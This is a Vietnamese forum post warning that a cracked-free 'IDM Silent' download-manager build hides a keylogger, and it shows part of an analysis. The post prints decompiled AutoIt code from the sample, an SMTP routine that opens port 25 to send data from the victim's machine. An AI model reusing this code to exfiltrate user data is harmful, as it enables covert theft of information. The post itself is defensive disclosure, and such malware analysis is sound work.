Bây giờ là:
Đăng Nhập
Quy định và điều bạn cần biết
Mon Dec 30, 2013 9:13 am by Admin
DIỄN ĐÀN VUI LÀ CHÍNH KHÔNG PHẢI LÀ WEBSITE CHÍNH THỨC
☞ Giao lưu không cay cú
☞ Các mem không spam icon
☞ Các mem có quyền phản ánh mod với cách làm việc
☞ Các mem không sử dụng ngôn từ không thích hợp
1/ Các bài viết, hình ảnh, nhạc... gởi vào diễn đàn không được:
* Toàn bộ phần chủ đề (hoặc nội …
☞ Giao lưu không cay cú
☞ Các mem không spam icon
☞ Các mem có quyền phản ánh mod với cách làm việc
☞ Các mem không sử dụng ngôn từ không thích hợp
1/ Các bài viết, hình ảnh, nhạc... gởi vào diễn đàn không được:
* Toàn bộ phần chủ đề (hoặc nội …
Comments: 1
Latest topics
Phát hiện KeyLogger ẩn náu trong bản IDM Silent “không cần crack”
Trang 1 trong tổng số 1 trang
Phát hiện KeyLogger ẩn náu trong bản IDM Silent “không cần crack”
Một Keylogger vừa tình cờ được phát hiện trong bản IDM Silent “không cần crack” đang được lan tràn trên Internet. Key Logger này được phát hiện nằm trong file: “C:\\windows\\system32\\IDMSL Auto Update.exe”, với mục đích là tự động update bản mới của IDM. Nhưng thực chất lại chứa những đoạn mã nhằm đánh cắp thông tin người dùng.
DM Silent là bản IDM được sử dụng rộng rãi và chia sẻ tràn lan trên internet. Đây là bản dùng miễn phí mà không cần không cần phải “crack”.
hững bản Crack hay patch, keygen luôn tiềm ẩn những nguy cơ. Nếu bạn đang sử dụng phiên bản này nên tiến hành xóa bỏ file này (nó không ảnh hưởng tới chương trình của bạn) hoặc dùng một bản IDM khác. Tôi cũng giới thiệu bạn một chương tình download khác có các tính năng tương tự và miễn phí là Orbit Downloader (click vào đây đển download).
Phân tích Keyloger
File này được nén bằng UPX. Sử dụng CFF Explorer để unpack chúng ta được
Sau quá trình dịch ngược có thể thu được mã nguồn của chương trình này
Phát hiện được đoạn code nghi ngờ:
Thêm nữa
Đoạn
Chính là máy chủ email mà KeyLogger này sử dụng, chương trình này không dùng các máy chủ mail thông thường như Gmail, Yahoo, hay hotmail. Sử dụng các kết nối TCP đến cổng 25 để gửi các thông tin, dữ liệu từ máy nạn nhân.
DM Silent là bản IDM được sử dụng rộng rãi và chia sẻ tràn lan trên internet. Đây là bản dùng miễn phí mà không cần không cần phải “crack”.
hững bản Crack hay patch, keygen luôn tiềm ẩn những nguy cơ. Nếu bạn đang sử dụng phiên bản này nên tiến hành xóa bỏ file này (nó không ảnh hưởng tới chương trình của bạn) hoặc dùng một bản IDM khác. Tôi cũng giới thiệu bạn một chương tình download khác có các tính năng tương tự và miễn phí là Orbit Downloader (click vào đây đển download).
Phân tích Keyloger
File này được nén bằng UPX. Sử dụng CFF Explorer để unpack chúng ta được
Sau quá trình dịch ngược có thể thu được mã nguồn của chương trình này
Phát hiện được đoạn code nghi ngờ:
- Code:
[Func _inetmail($s_mailto, $s_mailsubject, $s_mailbody)
Local $prev = Opt("ExpandEnvStrings", 1)
Local $var, $dflt = RegRead("HKCU\Software\Clients\Mail", "")
If $dflt = "Windows Live Mail" Then
$var = RegRead("HKCR\WLMail.Url.Mailto\Shell\open\command", "")
Else
$var = RegRead("HKCR\mailto\shell\open\command", "")
EndIf
Local $ret = Run(StringReplace($var, "%1", _inetexplorercapable("mailto:" & $s_mailto & "?
subject=" & $s_mailsubject & "&body=" & $s_mailbody)))
Local $nerror = @error, $nextended = @extended
Opt("ExpandEnvStrings", $prev)
Return SetError($nerror, $nextended, $ret)
EndFunc
Thêm nữa
- Code:
Func _inetsmtpmail($s_smtpserver, $s_fromname, $s_fromaddress, $s_toaddress, $s_subject =
"", $as_body = "", $s_helo = "", $s_first = " ", $b_trace = 0)
If $s_smtpserver = "" OR $s_fromaddress = "" OR $s_toaddress = "" OR $s_fromname = "" OR
StringLen($s_fromname) > 256 Then Return SetError(1, 0, 0)
If $s_helo = "" Then $s_helo = @ComputerName
If TCPStartup() = 0 Then Return SetError(2, 0, 0)
Local $s_ipaddress, $i_count
StringRegExp($s_smtpserver, "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|
[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9]
[0-9]?)")
If @extended Then
$s_ipaddress = $s_smtpserver
Else
$s_ipaddress = TCPNameToIP($s_smtpserver)
EndIf
If $s_ipaddress = "" Then
TCPShutdown()
Return SetError(3, 0, 0)
EndIf
Local $v_socket = TCPConnect($s_ipaddress, 25)
If $v_socket = -1 Then
TCPShutdown()
Return SetError(4, 0, 0)
EndIf
Local $s_send[6], $s_replycode[6]
$s_send[0] = "HELO " & $s_helo & @CRLF
If StringLeft($s_helo, 5) = "EHLO " Then $s_send[0] = $s_helo & @CRLF
$s_replycode[0] = "250"
$s_send[1] = "MAIL FROM: " & @CRLF
$s_replycode[1] = "250"
$s_send[2] = "RCPT TO: " & @CRLF
$s_replycode[2] = "250"
$s_send[3] = "DATA" & @CRLF
$s_replycode[3] = "354"
Local $aresult = _date_time_gettimezoneinformation()
Local $bias = -$aresult[1] / 60
Local $biash = Int($bias)
Local $biasm = 0
If $biash $bias Then $biasm = Abs($bias - $biash) * 60
$bias = StringFormat(" (%+.2d%.2d)", $biash, $biasm)
$s_send[4] = "From:" & $s_fromname & "" & @CRLF & "To:" & "" & @CRLF & "Subject:"
&$s_subject & @CRLF & "Mime-Version: 1.0" & @CRLF & "Date: " & _datedayofweek(@WDAY, 1) &
", " & @MDAY & " " & _datetomonth(@MON, 1) & " " & @YEAR & " " & @HOUR & ":" & @MIN & ":" &
@SEC & $bias & @CRLF & "Content-Type: text/plain; charset=US-ASCII" & @CRLF & @CRLF
$s_replycode[4] = ""
$s_send[5] = @CRLF & "." & @CRLF
$s_replycode[5] = "250"
If __smtpsend($v_socket, $s_send[0], $s_replycode[0], $b_trace, "220", $s_first) Then
Return SetError(50, 0, 0)
For $i_count = 1 To UBound($s_send) - 2
If __smtpsend($v_socket, $s_send[$i_count], $s_replycode[$i_count], $b_trace) Then Return
SetError(50 + $i_count, 0, 0)
Next
For $i_count = 0 To UBound($as_body) - 1
If StringLeft($as_body[$i_count], 1) = "." Then $as_body[$i_count] = "." &
$as_body[$i_count]
If __smtpsend($v_socket, $as_body[$i_count] & @CRLF, "", $b_trace) Then Return SetError(500
+ $i_count, 0, 0)
Next
$i_count = UBound($s_send) - 1
If __smtpsend($v_socket, $s_send[$i_count], $s_replycode[$i_count], $b_trace) Then Return
SetError(5000, 0, 0)
TCPCloseSocket($v_socket)
TCPShutdown()
Return 1
EndFunc
Đoạn
- Code:
StringRegExp($s_smtpserver, "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|
[01]?[0-9] [0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9]
[0-9]?)")
Chính là máy chủ email mà KeyLogger này sử dụng, chương trình này không dùng các máy chủ mail thông thường như Gmail, Yahoo, hay hotmail. Sử dụng các kết nối TCP đến cổng 25 để gửi các thông tin, dữ liệu từ máy nạn nhân.
Similar topics
» Top những phần mềm không thể không cài trên máy tính
» Những mẫu thiết kế Windows 9 hấp dẫn hiện nay
» Những lỗi vi phạm giao thông thường gặp và mức xử phạt cụ thể
» Nguyễn Trọng Tạo – Chuyện nhà thơ “5 say”
» Trong đám đông thiếu một anh hùng
» Những mẫu thiết kế Windows 9 hấp dẫn hiện nay
» Những lỗi vi phạm giao thông thường gặp và mức xử phạt cụ thể
» Nguyễn Trọng Tạo – Chuyện nhà thơ “5 say”
» Trong đám đông thiếu một anh hùng
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
|
|
Sun Sep 21, 2014 7:32 pm by anhkhoa1597
» Hướng dẫn mod khung viền trong LMHT
Tue Jul 22, 2014 2:31 pm by ltn1993st
» Cần lời Gải Thích
Fri Jul 11, 2014 1:21 pm by Admin
» Van Gaal: Thiên tài hay kẻ phụ bạc từ góc nhìn tâm lý học
Tue Jul 08, 2014 12:33 pm by Admin
» Brazil – Đức: Điệu Samba loạn nhịp trước “xe tăng”
Tue Jul 08, 2014 12:23 pm by Admin
» Anh K giải thích cái này nhé!
Fri Jun 06, 2014 6:46 am by Mr.Keen
» SQL injection - Các cách phòng chống và kết luận P7
Sun May 11, 2014 3:34 pm by Mr.Keen
» SQL injection - Một số tool khai thác P6
Sun May 11, 2014 3:33 pm by Mr.Keen
» SQL injection - Một số kỹ thuật vượt qua cơ chế lọc P5
Sun May 11, 2014 3:32 pm by Mr.Keen